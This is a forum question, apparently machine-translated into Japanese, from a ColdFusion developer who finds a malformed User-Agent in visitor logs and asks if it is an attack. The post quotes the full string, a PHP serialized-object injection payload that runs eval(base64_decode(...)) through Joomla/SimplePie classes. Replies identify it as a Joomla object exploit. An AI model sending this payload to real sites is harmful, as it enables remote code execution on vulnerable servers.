1
私は、ColdFusionで使用可能なcgi変数を使用して、domain、scriptName、queryString、remoteHost、userAgent、httpReferer、rtTimeStampなどのWebサイトの訪問者データを収集しています。範囲外のuserAgent文字列に関するエラーが発生しました。私は詳細を見て、cgi.userAgent変数が次を返したことを確認しました:破損したcgiユーザエージェントが攻撃の可能性があることを示していますか?
}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:
"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:
"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:
"javascript";i:9999;s:8:"feed_url";s:54:"eval(base64_decode($_POST[111]));JFactory:
:get();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ð'
私は可読性のために改行を追加しました。 cgi.httpReferrerは空白です。これはエラーですか、何らかの攻撃の兆候ですか?私はいつもcgi変数が幾分安全だと思っていますが、今ではそれらにも検証を追加するべきだと考えています。
私の究極の質問は誰もがこのコードを何らかの攻撃の形で認識していますか?
その文字列の最初の部分を非常に簡単に検索すると、Joomlaのオブジェクトエクスプロイトが非常によく似ています。 AFAIKは、userAgentのようにクライアントが提供するものは常に疑わしいものです。 https://security.stackexchange.com/questions/1310/security-review-http-header-user-agent-has-been-set-to-something – Leigh
私はuseragentがSQL文であった前にそれを持っていました! cfqueryparamありがとう:) – luke